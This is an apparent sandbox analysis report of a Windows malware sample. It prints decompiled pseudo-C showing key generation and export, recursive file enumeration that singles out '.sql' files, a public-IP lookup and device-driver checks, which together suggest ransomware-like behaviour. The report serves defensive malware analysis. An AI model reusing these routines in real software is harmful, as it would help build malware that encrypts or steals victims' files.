                                      					_t64 = VirtualAlloc(0, _t55, 0x3000, 0x40);
                                      					if(_t64 == 0 || _t63 >= _t55) {
                                      						CryptReleaseContext(_v8, 0);
                                      						VirtualFree(_t64, 0, 0x8000);
                                      						return 0;
                                      					} else {
                                      						_v48 = 0x70797243;
                                      						_v44 = 0x6e654774;
                                      						_v40 = 0x646e6152;
                                      						_v36 = 0x6d6f;
                                      						_v34 = 0;
                                      						_v32 = 0x61766441;
                                      						_v28 = 0x32336970;
                                      						_v24 = 0x6c6c642e;
                                      						_v20 = 0;
                                      						_t45 = GetModuleHandleA( &_v32);
                                      						if(_t45 != 0) {
                                      							L7:
                                      							_t19 =  &_v48; // 0x70797243
                                      							_t46 = GetProcAddress(_t45, _t19);
                                      							if(_t46 == 0) {
                                      								goto L13;
                                      							} else {
                                      								_push(_t64);
                                      								_push(_t63);
                                      								_push(_v8);
                                      								if( *_t46() == 0) {
                                      									goto L13;
                                      								} else {
                                      									_t60 = 0;
                                      									if(_t63 != 0) {
                                      										_t56 = _v12;
                                      										_v16 = 0x1a;
                                      										do {
                                      											asm("cdq");
                                      											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
                                      											_t60 = _t60 + 1;
                                      										} while (_t60 < _t63);
                                      									}
                                      									_t54 = 1;
                                      								}
                                      							}
                                      						} else {
                                      							_t18 =  &_v32; // 0x61766441
                                      							_t45 = LoadLibraryA(_t18);
                                      							if(_t45 == 0) {
                                      								L13:
                                      								_t54 = 0;
                                      							} else {
                                      								goto L7;
                                      							}
                                      						}
                                      						CryptReleaseContext(_v8, 0);
                                      						VirtualFree(_t64, 0, 0x8000);
                                      						goto L15;
                                      					}
                                      				}
                                      			}


























                                      0x00407c70
                                      0x00407c72
                                      0x00407c77
                                      0x00407c7a
                                      0x00407c7d
                                      0x00407c85
                                      0x00407d79
                                      0x00407d81
                                      0x00407c8b
                                      0x00407c8b
                                      0x00407c90
                                      0x00407c90
                                      0x00407c93
                                      0x00407c98
                                      0x00407c99
                                      0x00407ca5
                                      0x00407ca5
                                      0x00407cb1
                                      0x00407cb5
                                      0x00407d87
                                      0x00407d95
                                      0x00407da3
                                      0x00407cc3
                                      0x00407cc6
                                      0x00407cce
                                      0x00407cd5
                                      0x00407cdc
                                      0x00407ce2
                                      0x00407ce6
                                      0x00407ced
                                      0x00407cf4
                                      0x00407cfb
                                      0x00407cff
                                      0x00407d07
                                      0x00407d17
                                      0x00407d17
                                      0x00407d1c
                                      0x00407d24
                                      0x00000000
                                      0x00407d26
                                      0x00407d26
                                      0x00407d27
                                      0x00407d28
                                      0x00407d2f
                                      0x00000000
                                      0x00407d31
                                      0x00407d31
                                      0x00407d35
                                      0x00407d37
                                      0x00407d3a
                                      0x00407d41
                                      0x00407d45
                                      0x00407d4e
                                      0x00407d52
                                      0x00407d53
                                      0x00407d41
                                      0x00407d57
                                      0x00407d57
                                      0x00407d2f
                                      0x00407d09
                                      0x00407d09
                                      0x00407d0d
                                      0x00407d15
                                      0x00407d5e
                                      0x00407d5e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00407d15
                                      0x00407d65
                                      0x00407d73
                                      0x00000000
                                      0x00407d73
                                      0x00407cb5

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
                                      • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
                                      • GetModuleHandleA.KERNEL32(?), ref: 00407CFF
                                      • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
                                      • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D73
                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D87
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D95
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                      • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                      • API String ID: 3996966626-2152921537
                                      • Opcode ID: 0458a47c7d0f6a737997e540b1eda647f42b02ba3f55a885d4cf6adcdbbaa127
                                      • Instruction ID: 199b4cbb89f92d6933ab86ad2097cfc69592b150d2405189e4f4276a6cc67689
                                      • Opcode Fuzzy Hash: 0458a47c7d0f6a737997e540b1eda647f42b02ba3f55a885d4cf6adcdbbaa127
                                      • Instruction Fuzzy Hash: 8931F871E04209ABEB109FE4DD49BEEBB78EF44700F204079E505B62A1E775AE01CB6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E00407DB0(intOrPtr __ecx, intOrPtr __edx) {
                                      				long* _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				char _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				char _v32;
                                      				char _v34;
                                      				short _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				char _v48;
                                      				long** _t25;
                                      				struct HINSTANCE__* _t33;
                                      				_Unknown_base(*)()* _t34;
                                      				long _t40;
                                      				void* _t42;
                                      				void* _t46;
                                      				void* _t47;
                                      				void* _t48;
                                      
                                      				_t46 = 0;
                                      				_v16 = __ecx;
                                      				_t25 =  &_v8;
                                      				_v12 = __edx;
                                      				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
                                      				if(_t25 == 0) {
                                      					L10:
                                      					return _t46;
                                      				} else {
                                      					_t42 = 0;
                                      					do {
                                      						_t4 = _t42 + 0x61; // 0x61
                                      						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
                                      						_t42 = _t42 + 1;
                                      					} while (_t42 < 0x1a);
                                      					_t40 = __edx + 1;
                                      					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
                                      					if(_t47 == 0 || _v12 >= _t40) {
                                      						CryptReleaseContext(_v8, 0);
                                      						VirtualFree(_t47, 0, 0x8000);
                                      						return 0;
                                      					} else {
                                      						_v48 = 0x70797243;
                                      						_v44 = 0x6e654774;
                                      						_v40 = 0x646e6152;
                                      						_v36 = 0x6d6f;
                                      						_v34 = 0;
                                      						_v32 = 0x61766441;
                                      						_v28 = 0x32336970;
                                      						_v24 = 0x6c6c642e;
                                      						_v20 = 0;
                                      						_t33 = GetModuleHandleA( &_v32);
                                      						if(_t33 != 0) {
                                      							L7:
                                      							_t19 =  &_v48; // 0x70797243
                                      							_t34 = GetProcAddress(_t33, _t19);
                                      							if(_t34 != 0) {
                                      								 *_t34(_v8, _v12, _v16);
                                      								_t46 =  !=  ? 1 : _t46;
                                      							}
                                      						} else {
                                      							_t18 =  &_v32; // 0x61766441
                                      							_t33 = LoadLibraryA(_t18);
                                      							if(_t33 != 0) {
                                      								goto L7;
                                      							}
                                      						}
                                      						CryptReleaseContext(_v8, 0);
                                      						VirtualFree(_t47, 0, 0x8000);
                                      						goto L10;
                                      					}
                                      				}
                                      			}























                                      0x00407dc0
                                      0x00407dc2
                                      0x00407dc7
                                      0x00407dcd
                                      0x00407dd0
                                      0x00407dd8
                                      0x00407ea2
                                      0x00407eaa
                                      0x00407dde
                                      0x00407dde
                                      0x00407de0
                                      0x00407de0
                                      0x00407de3
                                      0x00407de7
                                      0x00407de8
                                      0x00407df4
                                      0x00407dfe
                                      0x00407e02
                                      0x00407eb0
                                      0x00407ebe
                                      0x00407ecc
                                      0x00407e11
                                      0x00407e14
                                      0x00407e1c
                                      0x00407e23
                                      0x00407e2a
                                      0x00407e30
                                      0x00407e34
                                      0x00407e3b
                                      0x00407e42
                                      0x00407e49
                                      0x00407e4d
                                      0x00407e55
                                      0x00407e65
                                      0x00407e65
                                      0x00407e6a
                                      0x00407e72
                                      0x00407e7d
                                      0x00407e86
                                      0x00407e86
                                      0x00407e57
                                      0x00407e57
                                      0x00407e5b
                                      0x00407e63
                                      0x00000000
                                      0x00000000
                                      0x00407e63
                                      0x00407e8e
                                      0x00407e9c
                                      0x00000000
                                      0x00407e9c
                                      0x00407e02

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,74CB66A0,00000000), ref: 00407DD0
                                      • VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 00407DF8
                                      • GetModuleHandleA.KERNEL32(?), ref: 00407E4D
                                      • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407E5B
                                      • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407E6A
                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407E8E
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407E9C
                                      • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EB0
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EBE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                      • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                      • API String ID: 3996966626-2152921537
                                      • Opcode ID: ecf7433da154a3d3e4de08d5f3ff40864c9027ea2fbed6340348b44d82ee8ddf
                                      • Instruction ID: be5cfa20fe97609e74d06931db444e7d7e20eeaeedb8336480d1c404223e93be
                                      • Opcode Fuzzy Hash: ecf7433da154a3d3e4de08d5f3ff40864c9027ea2fbed6340348b44d82ee8ddf
                                      • Instruction Fuzzy Hash: FA318471E05209AFEB109FA5DD49BEEBB78EF44701F104079E605B6291D774AE00CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 16%
                                      			E00405D80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                      				long* _v8;
                                      				long* _v12;
                                      				int _v16;
                                      				long** _t15;
                                      				long* _t16;
                                      				long _t23;
                                      
                                      				_t15 =  &_v8;
                                      				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                      				if(_t15 != 0) {
                                      					L6:
                                      					_t16 = _v8;
                                      					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12);
                                      					if(_t16 == 0) {
                                      					}
                                      					_v16 = 0;
                                      					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
                                      					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16);
                                      					CryptDestroyKey(_v12);
                                      					CryptReleaseContext(_v8, 0);
                                      					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10);
                                      					return 1;
                                      				}
                                      				_t23 = GetLastError();
                                      				if(_t23 != 0x80090016) {
                                      					return 0;
                                      				}
                                      				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                      				if(_t23 != 0) {
                                      					goto L6;
                                      				}
                                      				return 0;
                                      			}









                                      0x00405d91
                                      0x00405d95
                                      0x00405d9d
                                      0x00405dd5
                                      0x00405de3
                                      0x00405de7
                                      0x00405def
                                      0x00405def
                                      0x00405df2
                                      0x00405e0b
                                      0x00405e23
                                      0x00405e2d
                                      0x00405e39
                                      0x00405e4e
                                      0x00000000
                                      0x00405e54
                                      0x00405d9f
                                      0x00405daa
                                      0x00000000
                                      0x00405dce
                                      0x00405dbb
                                      0x00405dc3
                                      0x00000000
                                      0x00405dcc
                                      0x00000000

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,00404916,?,0040491E), ref: 00405D95
                                      • GetLastError.KERNEL32(?,0040491E), ref: 00405D9F
                                      • CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0040491E), ref: 00405DBB
                                      • CryptGenKey.ADVAPI32(0040491E,0000A400,08000001,?,?,0040491E), ref: 00405DE7
                                      • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 00405E0B
                                      • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 00405E23
                                      • CryptDestroyKey.ADVAPI32(?), ref: 00405E2D
                                      • CryptReleaseContext.ADVAPI32(0040491E,00000000), ref: 00405E39
                                      • CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 00405E4E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
                                      • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                      • API String ID: 137402220-1948191093
                                      • Opcode ID: 4ea6af53a05bc539ebf2c4aac83e9110a57bf35b6da581c5ea0214b087b6d0db
                                      • Instruction ID: a5e1c5bc4adb18f4c6cf36d0885f5ae2a65a9070c6c01f648420f3db759758e1
                                      • Opcode Fuzzy Hash: 4ea6af53a05bc539ebf2c4aac83e9110a57bf35b6da581c5ea0214b087b6d0db
                                      • Instruction Fuzzy Hash: FD216A75790308BBEB20CBA0DE4AF9B7779AB88B01F104425F701BA1D0C6B99940DB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 004077F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
                                        • Part of subcall function 004077F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED
                                      • VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,74CB66A0,?), ref: 0040690F
                                      • lstrlenW.KERNEL32(004103AC), ref: 0040691C
                                        • Part of subcall function 00407A00: InternetCloseHandle.WININET(?), ref: 00407A13
                                        • Part of subcall function 00407A00: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00407A32
                                      • lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,004103B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 0040694B
                                      • wsprintfW.USER32 ref: 00406963
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,004103B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 00406979
                                      • InternetCloseHandle.WININET(?), ref: 00406987
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
                                      • String ID: GET$ipv4bot.whatismyipaddress.com
                                      • API String ID: 4289327240-2259699238
                                      • Opcode ID: f6e984b446ea9cd393b48de9e600680bd352efed8e23861790de7f30075ba64f
                                      • Instruction ID: 036ff581c335500f2984d10930e2f34b8e696fb6c4e233a2217fb5cd2a6ee9c0
                                      • Opcode Fuzzy Hash: f6e984b446ea9cd393b48de9e600680bd352efed8e23861790de7f30075ba64f
                                      • Instruction Fuzzy Hash: 6201B13574020577EB206B729E4EF9F3A38AB85B11F140036FA05F61C1DEB89959C6AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E004066F0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
                                      				void* _v12;
                                      				intOrPtr _v16;
                                      				WCHAR* _v20;
                                      				intOrPtr _v24;
                                      				struct _WIN32_FIND_DATAW _v616;
                                      				void* _t35;
                                      				signed int _t37;
                                      				int _t39;
                                      				signed int _t42;
                                      				void* _t46;
                                      				signed int* _t48;
                                      				WCHAR* _t53;
                                      				intOrPtr* _t54;
                                      				short _t57;
                                      				WCHAR* _t63;
                                      				void* _t67;
                                      
                                      				_v24 = __edx;
                                      				_t63 = __ecx;
                                      				"SVWj@h"();
                                      				if(__eax == 0 || E004064A0(__ecx) != 0) {
                                      					L17:
                                      					__eflags = 0;
                                      					return 0;
                                      				} else {
                                      					E00406640(__ecx);
                                      					_t53 =  &(_t63[lstrlenW(__ecx)]);
                                      					_v20 = _t53;
                                      					lstrcatW(_t63, "*");
                                      					_t35 = FindFirstFileW(_t63,  &_v616);
                                      					_t57 = 0;
                                      					_v12 = _t35;
                                      					 *_t53 = 0;
                                      					if(_t35 != 0xffffffff) {
                                      						_t54 = _a12;
                                      						do {
                                      							_t37 = lstrcmpW( &(_v616.cFileName), ".");
                                      							__eflags = _t37;
                                      							if(_t37 != 0) {
                                      								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
                                      								__eflags = _t42;
                                      								if(_t42 != 0) {
                                      									lstrcatW(_t63,  &(_v616.cFileName));
                                      									__eflags = _v616.dwFileAttributes & 0x00000010;
                                      									if((_v616.dwFileAttributes & 0x00000010) == 0) {
                                      										_v16 =  *_t54;
                                      										_t46 = E004063B0(_t63,  &_v616, _t57, _a4);
                                      										_t67 = _t67 + 8;
                                      										 *_t54 =  *_t54 + _t46;
                                      										asm("adc [ebx+0x4], edx");
                                      										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
                                      										if(__eflags <= 0) {
                                      											if(__eflags < 0) {
                                      												L12:
                                      												_t48 = _a8;
                                      												 *_t48 =  *_t48 + 1;
                                      												__eflags =  *_t48;
                                      											} else {
                                      												__eflags = _v16 -  *_t54;
                                      												if(_v16 <  *_t54) {
                                      													goto L12;
                                      												}
                                      											}
                                      										}
                                      									} else {
                                      										E004066F0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
                                      										_t67 = _t67 + 0xc;
                                      									}
                                      									_t57 = 0;
                                      									__eflags = 0;
                                      									 *_v20 = 0;
                                      								}
                                      							}
                                      							_t39 = FindNextFileW(_v12,  &_v616);
                                      							__eflags = _t39;
                                      						} while (_t39 != 0);
                                      						FindClose(_v12);
                                      						goto L17;
                                      					} else {
                                      						return 0xdeadbeaf;
                                      					}
                                      				}
                                      			}



















                                      0x004066fc
                                      0x004066ff
                                      0x00406701
                                      0x00406708
                                      0x00406836
                                      0x00406836
                                      0x0040683c
                                      0x0040671d
                                      0x0040671d
                                      0x00406735
                                      0x00406738
                                      0x0040673b
                                      0x00406745
                                      0x0040674b
                                      0x0040674d
                                      0x00406750
                                      0x00406756
                                      0x00406764
                                      0x00406770
                                      0x0040677c
                                      0x00406782
                                      0x00406784
                                      0x00406796
                                      0x0040679c
                                      0x0040679e
                                      0x004067a8
                                      0x004067aa
                                      0x004067b1
                                      0x004067e2
                                      0x004067e5
                                      0x004067ea
                                      0x004067ed
                                      0x004067ef
                                      0x004067f2
                                      0x004067f5
                                      0x004067f7
                                      0x00406800
                                      0x00406800
                                      0x00406803
                                      0x00406803
                                      0x004067f9
                                      0x004067fc
                                      0x004067fe
                                      0x00000000
                                      0x00000000
                                      0x004067fe
                                      0x004067f7
                                      0x004067b3
                                      0x004067c7
                                      0x004067cc
                                      0x004067cc
                                      0x0040680e
                                      0x0040680e
                                      0x00406810
                                      0x00406810
                                      0x0040679e
                                      0x0040681d
                                      0x00406823
                                      0x00406823
                                      0x0040682e
                                      0x00000000
                                      0x00406758
                                      0x00406763
                                      0x00406763
                                      0x00406756

                                      APIs
                                        • Part of subcall function 00406110: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00406706,00000000,?,?), ref: 00406123
                                        • Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00406706,00000000,?,?), ref: 004061AE
                                        • Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00406706,00000000,?,?), ref: 004061C8
                                        • Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00406706,00000000,?,?), ref: 004061E2
                                        • Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00406706,00000000,?,?), ref: 004061FC
                                        • Part of subcall function 00406110: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 0040621C
                                        • Part of subcall function 004064A0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 004064B2
                                        • Part of subcall function 004064A0: lstrcatW.KERNEL32(00000000,00410364), ref: 004064C4
                                        • Part of subcall function 004064A0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004064D2
                                        • Part of subcall function 004064A0: lstrcmpW.KERNEL32(?,00410368,?,?), ref: 004064FC
                                        • Part of subcall function 004064A0: lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406512
                                        • Part of subcall function 004064A0: lstrcatW.KERNEL32(00000000,?), ref: 00406524
                                        • Part of subcall function 004064A0: lstrlenW.KERNEL32(00000000,?,?), ref: 0040652B
                                        • Part of subcall function 004064A0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0040655A
                                        • Part of subcall function 004064A0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00406571
                                        • Part of subcall function 004064A0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0040657C
                                        • Part of subcall function 004064A0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0040659A
                                        • Part of subcall function 004064A0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 004065AF
                                        • Part of subcall function 00406640: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00406722,00000000,?,?), ref: 00406655
                                        • Part of subcall function 00406640: wsprintfW.USER32 ref: 00406663
                                        • Part of subcall function 00406640: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0040667F
                                        • Part of subcall function 00406640: GetLastError.KERNEL32(?,?), ref: 0040668C
                                        • Part of subcall function 00406640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004066D8
                                      • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
                                      • lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745
                                      • lstrcmpW.KERNEL32(?,00410368,?,?), ref: 0040677C
                                      • lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406796
                                      • lstrcatW.KERNEL32(00000000,?), ref: 004067A8
                                      • lstrcatW.KERNEL32(00000000,0041039C), ref: 004067B9
                                      • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0040681D
                                      • FindClose.KERNEL32(00003000,?,?), ref: 0040682E
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
                                      • String ID:
                                      • API String ID: 1112924665-0
                                      • Opcode ID: eb068d23bd4874913e40b584eb86acccd6cc11bc9de15272c1017f03ccff3c16
                                      • Instruction ID: e664c09a6a9c308cb7d1e0fe319252d12530e52bee12665a8dc8c6cfb3a3f5dc
                                      • Opcode Fuzzy Hash: eb068d23bd4874913e40b584eb86acccd6cc11bc9de15272c1017f03ccff3c16
                                      • Instruction Fuzzy Hash: 60318F71A00219ABDF10AF65DD84AAE77B8EF44314B0584B7F806F7291DB389E50CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 35%
                                      			E00402F50(WCHAR* __ecx) {
                                      				unsigned int _v8;
                                      				char _v12;
                                      				WCHAR* _v16;
                                      				short _v2064;
                                      				long _t17;
                                      				void* _t18;
                                      				WCHAR* _t23;
                                      				unsigned int _t31;
                                      				void* _t35;
                                      				intOrPtr* _t39;
                                      				signed int _t40;
                                      
                                      				_t39 = __imp__EnumDeviceDrivers;
                                      				_v16 = __ecx;
                                      				_v8 = 0;
                                      				 *_t39( &_v12, 4,  &_v8);
                                      				_t17 = _v8;
                                      				if(_t17 != 0) {
                                      					_t18 = VirtualAlloc(0, _t17, 0x3000, 4);
                                      					_t35 = _t18;
                                      					if(_t35 != 0) {
                                      						_push( &_v12);
                                      						_push(_v8);
                                      						_push(_t35);
                                      						if( *_t39() == 0) {
                                      							L10:
                                      							VirtualFree(_t35, 0, 0x8000);
                                      							return 0;
                                      						} else {
                                      							_t40 = 0;
                                      							_t31 = _v8 >> 2;
                                      							if(_t31 <= 0) {
                                      								goto L10;
                                      							} else {
                                      								while(1) {
                                      									_t23 =  &_v2064;
                                      									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400);
                                      									if(_t23 != 0 && lstrcmpiW( &_v2064, _v16) == 0) {
                                      										break;
                                      									}
                                      									_t40 = _t40 + 1;
                                      									if(_t40 < _t31) {
                                      										continue;
                                      									} else {
                                      										goto L10;
                                      									}
                                      									goto L12;
                                      								}
                                      								VirtualFree(_t35, 0, 0x8000);
                                      								return 1;
                                      							}
                                      						}
                                      					} else {
                                      						return _t18;
                                      					}
                                      				} else {
                                      					return _t17;
                                      				}
                                      				L12:
                                      			}














                                      0x00402f5a
                                      0x00402f69
                                      0x00402f6d
                                      0x00402f74
                                      0x00402f76
                                      0x00402f7b
                                      0x00402f8d
                                      0x00402f93
                                      0x00402f97
                                      0x00402fa3
                                      0x00402fa4
                                      0x00402fa7
                                      0x00402fac
                                      0x00402ff2
                                      0x00402ffa
                                      0x00403008
                                      0x00402fae
                                      0x00402fb1
                                      0x00402fb3
                                      0x00402fb8
                                      0x00000000
                                      0x00402fc0
                                      0x00402fc0
                                      0x00402fc5
